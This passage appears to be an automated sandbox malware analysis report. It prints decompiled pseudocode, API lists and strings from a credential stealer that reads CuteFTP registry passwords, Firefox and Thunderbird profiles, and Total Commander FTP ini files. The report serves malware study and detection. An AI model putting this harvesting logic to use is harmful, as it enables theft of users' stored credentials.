                                                                                                                                        0x10004ffb
                                                                                                                                        0x10005000
                                                                                                                                        0x10005002
                                                                                                                                        0x1000500a
                                                                                                                                        0x1000500c
                                                                                                                                        0x10005018
                                                                                                                                        0x1000501d
                                                                                                                                        0x1000501d
                                                                                                                                        0x1000500c
                                                                                                                                        0x10005022
                                                                                                                                        0x10005025
                                                                                                                                        0x1000502a
                                                                                                                                        0x1000502c
                                                                                                                                        0x1000502c
                                                                                                                                        0x00000000

                                                                                                                                        APIs
                                                                                                                                        • StrStrIA.SHLWAPI(02874FF8,CUTEFTP), ref: 10004FFB
                                                                                                                                          • Part of subcall function 100023E6: lstrlenA.KERNEL32(?), ref: 100023FA
                                                                                                                                          • Part of subcall function 100023E6: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 10002419
                                                                                                                                          • Part of subcall function 100023E6: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 1000242B
                                                                                                                                          • Part of subcall function 100023E6: lstrlenA.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 1000243D
                                                                                                                                          • Part of subcall function 10001871: LocalFree.KERNEL32(00000000,?,10002A7A,00000000,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00000000,00000000,00000000), ref: 1000187D
                                                                                                                                        Strings
                                                                                                                                        • Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar, xrefs: 10005058
                                                                                                                                        • Software\GlobalSCAPE\CuteFTP 9\QCToolbar, xrefs: 100050A6
                                                                                                                                        • Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar, xrefs: 1000508C
                                                                                                                                        • CUTEFTP, xrefs: 10004FF5
                                                                                                                                        • Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar, xrefs: 10005065
                                                                                                                                        • Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar, xrefs: 10005072
                                                                                                                                        • Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar, xrefs: 10005099
                                                                                                                                        • \sm.dat, xrefs: 1000500F
                                                                                                                                        • Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar, xrefs: 1000507F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrlen$FreeLocal
                                                                                                                                        • String ID: CUTEFTP$Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar$Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar$Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar$Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar$Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar$Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar$Software\GlobalSCAPE\CuteFTP 9\QCToolbar$\sm.dat
                                                                                                                                        • API String ID: 1884169789-3073816274
                                                                                                                                        • Opcode ID: 6da64f6cf6c457a75d471d870fd20c73a0ee07e41b0f42b061a23daa4fce9d40
                                                                                                                                        • Instruction ID: 7fdc5397d1ef8ffd5e520bfd625dd7bb200c026372fa9f09274203f99b29d196
                                                                                                                                        • Opcode Fuzzy Hash: 6da64f6cf6c457a75d471d870fd20c73a0ee07e41b0f42b061a23daa4fce9d40
                                                                                                                                        • Instruction Fuzzy Hash: 482172B8104505BAFF51EF60CC02EAE3E65EF153C1F014125B909780BFDF71AA61EA45
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.42%

                                                                                                                                        Function 10005A20, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 140registryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E10005A20(intOrPtr _a4, char* _a8) {
				void* _v8;
				int _v12;
				int _v16;
				char _v2064;
				intOrPtr _v2068;
				intOrPtr _v2072;
				intOrPtr _v2076;
				intOrPtr _v2080;
				intOrPtr _v2084;
				intOrPtr _v2088;
				intOrPtr* _v2092;
				char _v2096;
				char _v2100;
				long _t57;
				long _t58;
				intOrPtr* _t72;

				_t57 = RegOpenKeyA( *0x1000f159, _a8,  &_v8); // executed
				_t58 = _t57;
				if(_t58 == 0) {
					_v12 = 0;
					while(1) {
						_v16 = 0x7ff;
						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
							break;
						}
						_v2068 = E10001E05(E10001DB1(_a8, "\\"),  &_v2064);
						_v2080 = E10001D2A( *0x1000f159, _v2068, "PW", 0);
						_v2072 = E10001D2A( *0x1000f159, _v2068, "Host", 0);
						_v2076 = E10001D2A( *0x1000f159, _v2068, "User", 0);
						_v2084 = E10001D2A( *0x1000f159, _v2068, "PthR", 0);
						_t72 = E10001D2A( *0x1000f159, _v2068, "Port",  &_v2096);
						if(_t72 == 0 || _v2096 != 4) {
							_t73 = _t72;
							if(_t72 != 0) {
								E10001871(_t73);
							}
							_v2088 = 0x15;
						} else {
							 *_t23 =  *_t72;
							E10001871(_t72);
						}
						_v2092 = E10001D2A( *0x1000f159, _v2068, "SSH",  &_v2100);
						if(_v2080 != 0 && _v2072 != 0 && _v2076 != 0) {
							E10001522(_a4, 0xbeef0010);
							E10001584(_a4, _v2072);
							E10001584(_a4, _v2076);
							E10001584(_a4, _v2080);
							E10001522(_a4, _v2088);
							E10001584(_a4, _v2084);
							if(_v2092 == 0 || _v2100 != 4) {
								E10001522(_a4, 0);
							} else {
								E10001522(_a4,  *_v2092);
							}
						}
						E10001871(_v2080);
						E10001871(_v2072);
						E10001871(_v2076);
						E10001871(_v2084);
						E10001871(_v2092);
						E10001871(_v2068);
						_v12 = _v12 + 1;
					}
					return RegCloseKey(_v8);
				}
				return _t58;
			}



















                                                                                                                                        0x10005a36
                                                                                                                                        0x10005a3b
                                                                                                                                        0x10005a3d
                                                                                                                                        0x10005a43
                                                                                                                                        0x10005a4a
                                                                                                                                        0x10005a4a
                                                                                                                                        0x10005a71
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x10005a94
                                                                                                                                        0x10005ab2
                                                                                                                                        0x10005ad0
                                                                                                                                        0x10005aee
                                                                                                                                        0x10005b0c
                                                                                                                                        0x10005b2f
                                                                                                                                        0x10005b31
                                                                                                                                        0x10005b4c
                                                                                                                                        0x10005b4e
                                                                                                                                        0x10005b51
                                                                                                                                        0x10005b51
                                                                                                                                        0x10005b56
                                                                                                                                        0x10005b3c
                                                                                                                                        0x10005b3e
                                                                                                                                        0x10005b45
                                                                                                                                        0x10005b45
                                                                                                                                        0x10005b7d
                                                                                                                                        0x10005b8a
                                                                                                                                        0x10005bb2
                                                                                                                                        0x10005bc0
                                                                                                                                        0x10005bce
                                                                                                                                        0x10005bdc
                                                                                                                                        0x10005bea
                                                                                                                                        0x10005bf8
                                                                                                                                        0x10005c04
                                                                                                                                        0x10005c26
                                                                                                                                        0x10005c0f
                                                                                                                                        0x10005c1a
                                                                                                                                        0x10005c1a
                                                                                                                                        0x10005c04
                                                                                                                                        0x10005c31
                                                                                                                                        0x10005c3c
                                                                                                                                        0x10005c47
                                                                                                                                        0x10005c52
                                                                                                                                        0x10005c5d
                                                                                                                                        0x10005c68
                                                                                                                                        0x10005c6d
                                                                                                                                        0x10005c6d
                                                                                                                                        0x00000000
                                                                                                                                        0x10005c78
                                                                                                                                        0x10005c7e

                                                                                                                                        APIs
                                                                                                                                        • RegOpenKeyA.ADVAPI32(?,?), ref: 10005A36
                                                                                                                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 10005A6A
                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 10005C78
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseEnumOpen
                                                                                                                                        • String ID: Host$Port$PthR$SSH$User
                                                                                                                                        • API String ID: 1332880857-1643752846
                                                                                                                                        • Opcode ID: ca9a7a4c7330c150e1eabc2d28caf2c9fdcfafb3968b0b5e5b29e96d8aaaaa8a
                                                                                                                                        • Instruction ID: c14ecc450117f64a99103eb1540e63d5e0307dc6e70b8a7d01c738e33745f537
                                                                                                                                        • Opcode Fuzzy Hash: ca9a7a4c7330c150e1eabc2d28caf2c9fdcfafb3968b0b5e5b29e96d8aaaaa8a
                                                                                                                                        • Instruction Fuzzy Hash: 3351063590051CEAEF21AB60CC45BEDBBB9FF04781F10C0A5F54865469DF72AE91AF81
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.06%

                                                                                                                                        Function 10007515, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 119COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 89%
                                                                                                                                        			E10007515(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				CHAR* _v8;
				CHAR* _v12;
				intOrPtr _v16;
				CHAR* _v20;
				void* _t32;
				void* _t33;
				void* _t34;
				void* _t35;
				intOrPtr _t38;
				CHAR* _t40;
				void* _t42;
				void* _t48;
				long _t49;
				long _t53;
				int _t55;
				char* _t57;
				char* _t61;
				char* _t62;
				CHAR* _t63;

				_t32 = E10001F38(_a8); // executed
				_t33 = _t32;
				if(_t33 != 0) {
					_t34 = E10001F38(_a12); // executed
					_t35 = _t34;
					if(_t35 != 0) {
						if(E10002582(_a8) != 0) {
							_t38 = E10001DB1(_a8, 0);
						} else {
							_t38 = E10001DB1(_a8, "\\");
						}
						_v16 = _t38;
						_v12 = E10001DB1(_v16, "profiles.ini");
						_t40 = E10001888(0xfdea); // executed
						_v8 = _t40;
						_v20 = E10001888(0x1000);
						_t42 = E10001EEF(_v12); // executed
						if(_t42 != 0) {
							_t49 = GetPrivateProfileSectionNamesA(_v8, 0xfde8, _v12); // executed
							if(_t49 > 2) {
								_t63 = _v8;
								if( *_t63 != 0) {
									do {
										if(StrStrIA(_t63, "Profile") != 0) {
											_t53 = GetPrivateProfileStringA(_t63, "Path", 0x1000f137, _v20, 0xfff, _v12); // executed
											if(_t53 != 0) {
												_t55 = GetPrivateProfileIntA(_t63, "IsRelative", 1, _v12); // executed
												if(_t55 != 1) {
													E100074FD(_a4, _v20, _a12);
												} else {
													_t57 = E10001DB1(_v16, _v20);
													_push(_t57);
													_t61 = _t57;
													while(1) {
														_t62 = _t61;
														if(_t62 == 0 ||  *_t62 == 0) {
															break;
														}
														if( *_t62 == 0x2f) {
															 *_t62 = 0x5c;
														}
														_t61 = _t62 + 1;
													}
													E100074FD(_a4, _t57, _a12); // executed
													E10001871();
												}
											}
										}
										asm("cld");
										asm("repne scasb");
									} while ( *_t63 != 0);
								}
							}
						}
						E10001871(_v16);
						E10001871(_v20);
						E10001871(_v12);
						E10001871(_v8); // executed
						_t48 = E100074FD(_a4, _a8, _a12); // executed
						return _t48;
					} else {
						return _t35;
					}
				} else {
					return _t33;
				}
			}






















                                                                                                                                        0x1000751f
                                                                                                                                        0x10007524
                                                                                                                                        0x10007526
                                                                                                                                        0x10007530
                                                                                                                                        0x10007535
                                                                                                                                        0x10007537
                                                                                                                                        0x10007548
                                                                                                                                        0x1000755e
                                                                                                                                        0x1000754a
                                                                                                                                        0x10007552
                                                                                                                                        0x10007552
                                                                                                                                        0x10007563
                                                                                                                                        0x10007573
                                                                                                                                        0x1000757b
                                                                                                                                        0x10007580
                                                                                                                                        0x1000758d
                                                                                                                                        0x10007593
                                                                                                                                        0x1000759a
                                                                                                                                        0x100075ab
                                                                                                                                        0x100075b3
                                                                                                                                        0x100075b9
                                                                                                                                        0x100075bf
                                                                                                                                        0x100075c5
                                                                                                                                        0x100075d2
                                                                                                                                        0x100075ea
                                                                                                                                        0x100075f1
                                                                                                                                        0x100075fe
                                                                                                                                        0x10007606
                                                                                                                                        0x10007646
                                                                                                                                        0x10007608
                                                                                                                                        0x1000760e
                                                                                                                                        0x10007613
                                                                                                                                        0x10007614
                                                                                                                                        0x10007621
                                                                                                                                        0x10007621
                                                                                                                                        0x10007623
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x1000761b
                                                                                                                                        0x1000761d
                                                                                                                                        0x1000761d
                                                                                                                                        0x10007620
                                                                                                                                        0x10007620
                                                                                                                                        0x10007631
                                                                                                                                        0x10007636
                                                                                                                                        0x10007636
                                                                                                                                        0x10007606
                                                                                                                                        0x100075f1
                                                                                                                                        0x1000764b
                                                                                                                                        0x10007653
                                                                                                                                        0x10007655
                                                                                                                                        0x100075c5
                                                                                                                                        0x100075bf
                                                                                                                                        0x100075b3
                                                                                                                                        0x10007660
                                                                                                                                        0x10007668
                                                                                                                                        0x10007670
                                                                                                                                        0x10007678
                                                                                                                                        0x10007686
                                                                                                                                        0x1000768d
                                                                                                                                        0x1000753b
                                                                                                                                        0x1000753b
                                                                                                                                        0x1000753b
                                                                                                                                        0x1000752a
                                                                                                                                        0x1000752a
                                                                                                                                        0x1000752a

                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: IsRelative$Path$Profile$profiles.ini
                                                                                                                                        • API String ID: 0-4107377610
                                                                                                                                        • Opcode ID: 81c0fd32d6717f921d573a250075c8a8f3e788a2228be87d5054b32b657cd280
                                                                                                                                        • Instruction ID: 85f9e47206b8348aed535847340b693f762fa8b9e309845cd9064b8e993d129c
                                                                                                                                        • Opcode Fuzzy Hash: 81c0fd32d6717f921d573a250075c8a8f3e788a2228be87d5054b32b657cd280
                                                                                                                                        • Instruction Fuzzy Hash: F1417175E04946BAFF12DFA4DC02EED7FB2FF012C0F148161F525640AADB7A9A51AB10
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 16.53%

                                                                                                                                        Function 10003B95, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 133stringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 76%
                                                                                                                                        			E10003B95(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, char** _a12) {
				char* _v8;
				int _v12;
				char*** _v16;
				void* __ebx;
				void* __ebp;
				void* _t39;
				char* _t47;
				char* _t48;
				char* _t49;
				char* _t50;
				void* _t52;
				void* _t54;
				void* _t66;
				char* _t82;
				char* _t83;
				void* _t84;
				char* _t87;
				char* _t88;
				void* _t89;

				_t73 = __edx;
				_v8 = E10001888(0x7d00);
				E10001000( &_v16, __ecx, __edx,  &_v16);
				_t66 = 0;
				while(1) {
					_t39 = E10003A4D(_a4, _v16, 0xfa00, 0xa); // executed
					if(_t39 == 0 || E10001091(_t39, _t66, _t73, _v16) > 0xfa00) {
						break;
					}
					if(E10003B47(_t73, _v16) == 0) {
						continue;
					}
					E100012E8(_t44, _t73, _v16);
					_t77 =  *_v16;
					( *_v16)[3](_v16, _v8, 0x2134, 0);
					_v12 = 0;
					_t47 = StrStrIA(_v8, "Content-Length:");
					_push(_t66);
					_t48 = _t47;
					if(_t48 != 0) {
						_t87 =  &(_t48[lstrlenA("Content-Length:")]);
						_push(_t87);
						_t88 =  &(_t87[1]);
						asm("repne scasb");
						 *((char*)(_t88 - 1)) = 0;
						_v12 = StrToIntA(_t88);
						_t89 = _t88;
						 *((char*)(_t89 - 1)) = 0xd;
					}
					_pop(_t67);
					_t49 = StrStrIA(_v8, "Location:");
					_t50 = _t49;
					if(_t50 != 0) {
						_t82 =  &(_t50[lstrlenA("Location:")]);
						_push(_t82);
						_t83 =  &(_t82[1]);
						asm("repne scasb");
						 *((char*)(_t83 - 1)) = 0;
						_push(_t83);
						_t50 = E100029F6(_t83);
						_t77 = _a12;
						if(_t77 == 0) {
							_t50 = E10001871(_t50);
						} else {
							 *_t77 = _t50;
						}
						_pop(_t84);
						 *((char*)(_t84 - 1)) = 0xd;
					}
					_pop(_t66);
					E10001356(_t50, _t77, _v16);
					if(_v12 <= 0) {
						_v12 = 0xa00000;
					}
					_t52 = E10003ABF(_a4, _v16, _v12); // executed
					_t54 = E10001091(_t52, _t66, _t77, _v16);
					if(_t54 != 0) {
						if(_t54 != 0) {
							_push(_a8);
							_push(_v16);
							if(( *_v16)[0xd]() >= 0) {
								_t66 = 1;
							}
						}
					}
					break;
				}
				( *_v16)[2](_v16);
				E10001871(_v8);
				return _t66;
			}






















                                                                                                                                        0x10003b95
                                                                                                                                        0x10003ba7
                                                                                                                                        0x10003bae
                                                                                                                                        0x10003bb3
                                                                                                                                        0x10003bb5
                                                                                                                                        0x10003bc2
                                                                                                                                        0x10003bc9
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x10003bed
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x10003bf2
                                                                                                                                        0x10003bfa
                                                                                                                                        0x10003c09
                                                                                                                                        0x10003c0c
                                                                                                                                        0x10003c1b
                                                                                                                                        0x10003c20
                                                                                                                                        0x10003c21
                                                                                                                                        0x10003c23
                                                                                                                                        0x10003c31
                                                                                                                                        0x10003c33
                                                                                                                                        0x10003c34
                                                                                                                                        0x10003c3e
                                                                                                                                        0x10003c47
                                                                                                                                        0x10003c52
                                                                                                                                        0x10003c55
                                                                                                                                        0x10003c56
                                                                                                                                        0x10003c5a
                                                                                                                                        0x10003c5b
                                                                                                                                        0x10003c64
                                                                                                                                        0x10003c6a
                                                                                                                                        0x10003c6c
                                                                                                                                        0x10003c7a
                                                                                                                                        0x10003c7c
                                                                                                                                        0x10003c7d
                                                                                                                                        0x10003c87
                                                                                                                                        0x10003c90
                                                                                                                                        0x10003c94
                                                                                                                                        0x10003c96
                                                                                                                                        0x10003c9e
                                                                                                                                        0x10003ca0
                                                                                                                                        0x10003ca7
                                                                                                                                        0x10003ca2
                                                                                                                                        0x10003ca2
                                                                                                                                        0x10003ca2
                                                                                                                                        0x10003cac
                                                                                                                                        0x10003cad
                                                                                                                                        0x10003cb1
                                                                                                                                        0x10003cb2
                                                                                                                                        0x10003cb6
                                                                                                                                        0x10003cbf
                                                                                                                                        0x10003cc1
                                                                                                                                        0x10003cc1
                                                                                                                                        0x10003cd1
                                                                                                                                        0x10003cde
                                                                                                                                        0x10003ce0
                                                                                                                                        0x10003ce6
                                                                                                                                        0x10003ced
                                                                                                                                        0x10003cf0
                                                                                                                                        0x10003cf8
                                                                                                                                        0x10003cfa
                                                                                                                                        0x10003cfa
                                                                                                                                        0x10003cf8
                                                                                                                                        0x10003ce6
                                                                                                                                        0x00000000
                                                                                                                                        0x10003ce0
                                                                                                                                        0x10003d07
                                                                                                                                        0x10003d0d
                                                                                                                                        0x10003d17

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 10001888: LocalAlloc.KERNEL32(00000040,-00000080,?,10002A53,?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 10001896
                                                                                                                                        • StrStrIA.SHLWAPI(?,Content-Length:), ref: 10003C1B
                                                                                                                                        • lstrlenA.KERNEL32(Content-Length:,00000000,?,Content-Length:), ref: 10003C2C
                                                                                                                                        • StrToIntA.SHLWAPI(00000001,00000001,00000000,Content-Length:,00000000,?,Content-Length:), ref: 10003C4D
                                                                                                                                        • StrStrIA.SHLWAPI(?,Location:,?,Content-Length:), ref: 10003C64
                                                                                                                                        • lstrlenA.KERNEL32(Location:,00000000,?,Location:,?,Content-Length:), ref: 10003C75
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrlen$AllocLocal
                                                                                                                                        • String ID: Content-Length:$Location:
                                                                                                                                        • API String ID: 2140729754-2400408565
                                                                                                                                        • Opcode ID: ae2eff76657db54955c8ca96dc74d28d1043526168dc1cc857f9fcbc112df143
                                                                                                                                        • Instruction ID: 2a7beda4beeaf4579a8e03f3651bf29a53b37e5b3a39614d2f1fc213eebf3131
                                                                                                                                        • Opcode Fuzzy Hash: ae2eff76657db54955c8ca96dc74d28d1043526168dc1cc857f9fcbc112df143
                                                                                                                                        • Instruction Fuzzy Hash: E2419E39A04109BBFB02CBA4CC42FDEFBAAEF413C4F208175F510A6169DB75AA519710
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.06%

                                                                                                                                        Function 1000AE2D, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 53COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E1000AE2D(void* __ebx, void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				char _v269;
				void* _t28;
				void* _t29;
				void* _t30;

				_t30 = __eflags;
				_t29 = __edx;
				_t28 = __ecx;
				_v8 = E100015A9(_a4, 0x5f, 0);
				 *0x10010155 = 2;
				GetCurrentDirectoryA(0x104,  &_v269);
				E10007690(_t28, _a4,  *0x1000f159, "Software\\Mozilla", "Thunderbird", "\\Thunderbird"); // executed
				E10007690(_t28, _a4, 0x80000002, "Software\\Mozilla", "Thunderbird", "\\Thunderbird"); // executed
				SetCurrentDirectoryA( &_v269);
				 *0x10010155 = 3;
				GetCurrentDirectoryA(0x104,  &_v269);
				E10007690(_t28, _a4,  *0x1000f159, "Software\\Mozilla", "Thunderbird", "\\Thunderbird"); // executed
				E10007690(_t28, _a4, 0x80000002, "Software\\Mozilla", "Thunderbird", "\\Thunderbird"); // executed
				SetCurrentDirectoryA( &_v269);
				return E100015EF(__ebx, _t28, _t29, _t30, _a4, _v8);
			}








                                                                                                                                        0x1000ae2d
                                                                                                                                        0x1000ae2d
                                                                                                                                        0x1000ae2d
                                                                                                                                        0x1000ae42
                                                                                                                                        0x1000ae45
                                                                                                                                        0x1000ae5b
                                                                                                                                        0x1000ae78
                                                                                                                                        0x1000ae94
                                                                                                                                        0x1000aea0
                                                                                                                                        0x1000aea5
                                                                                                                                        0x1000aebb
                                                                                                                                        0x1000aed8
                                                                                                                                        0x1000aef4
                                                                                                                                        0x1000af00
                                                                                                                                        0x1000af11

                                                                                                                                        APIs
                                                                                                                                        • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 1000AE5B
                                                                                                                                          • Part of subcall function 10007690: StrStrIA.SHLWAPI(?,?), ref: 1000769C
                                                                                                                                          • Part of subcall function 10007690: RegOpenKeyA.ADVAPI32(?,?,?), ref: 10007713
                                                                                                                                          • Part of subcall function 10007690: RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 1000773F
                                                                                                                                          • Part of subcall function 10007690: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 10007787
                                                                                                                                        • SetCurrentDirectoryA.KERNEL32(?,?), ref: 1000AEA0
                                                                                                                                        • GetCurrentDirectoryA.KERNEL32(00000104,?,?,?), ref: 1000AEBB
                                                                                                                                        • SetCurrentDirectoryA.KERNEL32(?,?,?,?), ref: 1000AF00
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CurrentDirectory$CloseEnumOpen
                                                                                                                                        • String ID: Software\Mozilla$Thunderbird$\Thunderbird
                                                                                                                                        • API String ID: 3062143572-138716004
                                                                                                                                        • Opcode ID: 12d72ab7a4eccd75781151bb546f92bb5fba04da43f670e697823352a6315417
                                                                                                                                        • Instruction ID: c15bf0b149e3c705492bf9dd77d3d2ff96b80851e8c4f303338656cc4bd5f1d4
                                                                                                                                        • Opcode Fuzzy Hash: 12d72ab7a4eccd75781151bb546f92bb5fba04da43f670e697823352a6315417
                                                                                                                                        • Instruction Fuzzy Hash: C0114C35A10518BAEB00EF90CD46FC93A68FB14380F408050F7887C167D7B9EA90DB85
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.10%

                                                                                                                                        Function 1000484D, Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 151COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E1000484D(void* __ebx, void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				CHAR* _v12;
				intOrPtr _v16;
				int _t37;
				void* _t39;
				void* _t41;
				void* _t42;
				void* _t43;
				void* _t44;
				void* _t47;
				intOrPtr _t49;
				intOrPtr _t50;
				void* _t51;
				intOrPtr _t53;
				intOrPtr _t54;
				void* _t55;
				intOrPtr _t57;
				intOrPtr _t58;
				void* _t59;
				intOrPtr _t61;
				intOrPtr _t62;
				void* _t79;
				void* _t80;
				void* _t81;

				_t81 = __edx;
				_t80 = __ecx;
				_t79 = __ebx;
				_v8 = E100015A9(_a4, 2, 0);
				"wcx_ftp.ini" = 0x77;
				M1000F9BF = 0x47;
				"Ghisler\\Total Commander" = 0x47;
				_v12 = E10001888(0x105);
				_t37 = GetWindowsDirectoryA(_v12, 0x104);
				if(_t37 == 0) {
					L3:
					E10001871(_v12);
				} else {
					_t84 = _t37 - 0x104;
					if(_t37 > 0x104) {
						goto L3;
					} else {
						E1000471A(_a4, _v12); // executed
					}
				}
				_t39 = E10001E6A(_t84, 0x28); // executed
				E1000471A(_a4, _t39); // executed
				_t41 = E10001E6A(_t84, 0x1a); // executed
				_t42 = _t41;
				_t85 = _t42;
				if(_t42 != 0) {
					E1000471A(_a4, E10001E05(_t42, "\\GHISLER")); // executed
				}
				_t43 = E10001E6A(_t85, 0x23); // executed
				_t44 = _t43;
				_t86 = _t44;
				if(_t44 != 0) {
					E1000471A(_a4, E10001E05(_t44, "\\GHISLER")); // executed
				}
				_t46 = E10001E6A(_t86, 0x1c);
				if(E10001E6A(_t86, 0x1c) != 0) {
					E1000471A(_a4, E10001E05(_t46, "\\GHISLER")); // executed
				}
				_t47 = E10001D2A( *0x1000f159, "Software\\Ghisler\\Windows Commander", "InstallDir", 0); // executed
				E1000471A(_a4, _t47);
				_t49 = E10001D2A( *0x1000f159, "Software\\Ghisler\\Windows Commander", "FtpIniName", 0); // executed
				_t50 = _t49;
				if(_t50 != 0) {
					_v16 = _t50;
					E10004703(_a4, _v16);
					E10001871(_v16);
				}
				_t51 = E10001D2A( *0x1000f159, "Software\\Ghisler\\Total Commander", "InstallDir", 0); // executed
				E1000471A(_a4, _t51);
				_t53 = E10001D2A( *0x1000f159, "Software\\Ghisler\\Total Commander", "FtpIniName", 0); // executed
				_t54 = _t53;
				if(_t54 != 0) {
					_v16 = _t54;
					E10004703(_a4, _v16);
					E10001871(_v16);
				}
				_t55 = E10001D2A(0x80000002, "Software\\Ghisler\\Windows Commander", "InstallDir", 0); // executed
				E1000471A(_a4, _t55);
				_t57 = E10001D2A(0x80000002, "Software\\Ghisler\\Windows Commander", "FtpIniName", 0); // executed
				_t58 = _t57;
				if(_t58 != 0) {
					_v16 = _t58;
					E10004703(_a4, _v16);
					E10001871(_v16);
				}
				_t59 = E10001D2A(0x80000002, "Software\\Ghisler\\Total Commander", "InstallDir", 0); // executed
				E1000471A(_a4, _t59);
				_t61 = E10001D2A(0x80000002, "Software\\Ghisler\\Total Commander", "FtpIniName", 0); // executed
				_t62 = _t61;
				_t91 = _t62;
				if(_t62 != 0) {
					_v16 = _t62;
					E10004703(_a4, _v16);
					E10001871(_v16);
				}
				return E100015EF(_t79, _t80, _t81, _t91, _a4, _v8);
			}



























                                                                                                                                        0x1000484d
                                                                                                                                        0x1000484d
                                                                                                                                        0x1000484d
                                                                                                                                        0x1000485f
                                                                                                                                        0x10004862
                                                                                                                                        0x10004869
                                                                                                                                        0x10004870
                                                                                                                                        0x10004881
                                                                                                                                        0x10004891
                                                                                                                                        0x10004893
                                                                                                                                        0x100048a9
                                                                                                                                        0x100048ac
                                                                                                                                        0x10004895
                                                                                                                                        0x10004895
                                                                                                                                        0x1000489a
                                                                                                                                        0x00000000
                                                                                                                                        0x1000489c
                                                                                                                                        0x100048a2
                                                                                                                                        0x100048a2
                                                                                                                                        0x1000489a
                                                                                                                                        0x100048b3
                                                                                                                                        0x100048bc
                                                                                                                                        0x100048c3
                                                                                                                                        0x100048c8
                                                                                                                                        0x100048c8
                                                                                                                                        0x100048ca
                                                                                                                                        0x100048db
                                                                                                                                        0x100048db
                                                                                                                                        0x100048e2
                                                                                                                                        0x100048e7
                                                                                                                                        0x100048e7
                                                                                                                                        0x100048e9
